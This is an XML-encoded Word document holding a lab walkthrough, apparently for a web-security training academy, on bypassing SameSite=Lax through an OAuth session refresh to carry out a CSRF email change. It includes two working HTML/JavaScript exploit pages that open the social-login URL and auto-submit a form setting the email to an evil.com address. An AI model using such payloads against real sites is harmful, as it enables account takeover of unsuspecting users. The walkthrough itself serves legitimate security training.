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CSRF  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 10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CSRF via OAuth session refresh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CSRF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10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OAuth session refresh to bypass SameSite=Lax and perform a CSRF email change.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CSRF via OAuth Session Refresh – PoC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Lab Goal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Exploit the change email functionality using CSRF by refreshing the victim’s OAuth session cookie and bypassing SameSite=Lax restrictions.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1 — Login via Social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the lab.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Login with social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Complete OAuth authentication.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2 — Change Email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/my-account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Change your email address.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3 — Observe Vulnerable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Go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Proxy → HTTP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Find request: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POST /my-account/change-email HTTP/2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Observe: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CSRF token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Request depends only on session cookie.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4 — Observe OAuth Cookie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Burp history inspect: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GET /oauth-callback?code=...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Observe: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Session cookie is issued.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explicit SameSite attribute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Browser automatically applies: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SameSite=Lax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5 — Understand the Vulnerability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Newly issued cookies temporarily bypass Lax restrictions.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Visiting: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/social-login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automatically refreshes the victim session cookie.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6 — Create Initial PoC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Exploit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Paste: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&lt;form method="POST" action="https://0a17008b046492dd80862b7900f100e4.web-security-academy.net/my-account/change-email"&gt;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&lt;input type="hidden" name="email" value="test123@evil.com"&gt;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&lt;/form&gt;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&lt;script&gt;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window.open('https://0a17008b046492dd80862b7900f100e4.web-security-academy.net/social-login');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setTimeout(changeEmail, 5000);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function changeEmail(){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document.forms[0].submit();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&lt;/script&gt;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View exploit.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Observe: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Popup blocked by browser.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7 — Bypass Popup Blocker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Modify exploit so popup opens only after user interaction.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Final working payload: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&lt;form method="POST" action="https://0a17008b046492dd80862b7900f100e4.web-security-academy.net/my-account/change-email"&gt;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&lt;input type="hidden" name="email" value="freshvictim2026@evil.com"&gt;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&lt;/form&gt;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&lt;h1&gt;Click anywhere&lt;/h1&gt;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&lt;script&gt;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window.onclick = () =&gt; {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window.open('https://0a17008b046492dd80862b7900f100e4.web-security-academy.net/social-login');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setTimeout(changeEmail, 5000);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function changeEmail() {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document.forms[0].submit();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&lt;/script&gt;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8 — Test Exploit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View exploit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anywhere on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OAuth popup opens.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Wait 5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Email changes automatically.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9 — Verify CSRF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/my-account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Confirm email address changed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="FADBD8" w:val="clear"/>
        <w:spacing w:after="60" w:before="160"/>
        <w:ind w:left="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="922B21"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 10 — Deliver Final Exploit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Change email to a NEW unused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Example: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finalsolve9981@evil.com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Store again.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 to victim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Lab solved successfully.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1st Iamge Lab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2nd Request After My Account Check The Behaviour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Check Teh Behaviour The Request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Find The 2 Request MyAccoutnMailcChange And Callback Code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Lab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6: Login Account And Change The Email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7: Uplaod The Paylaod On Body Section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CSRF via OAuth session refresh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CSRF — Lab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32383ff77f063b608c45c54ecd7e93184a52635.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/934b2b8d766fb6f4f2bb3bbf5e6e40bd8deaae54.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/3f18fb93502539a2362542dd12fe2d779f2de2bf.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/d0e58133b671c7b4e7b2afc0b10d3a5ff64876e8.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/aaa905991975ec5e8027c098bd654bc03be55ede.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/972f0b22641a14b10b80c3e3b4ddab7ccf29194f.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/5c1064ac8fb858fef0e6948b2dc50f0c2887c53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2026-05-24T12:08:32.467Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-24T12:08:32.467Z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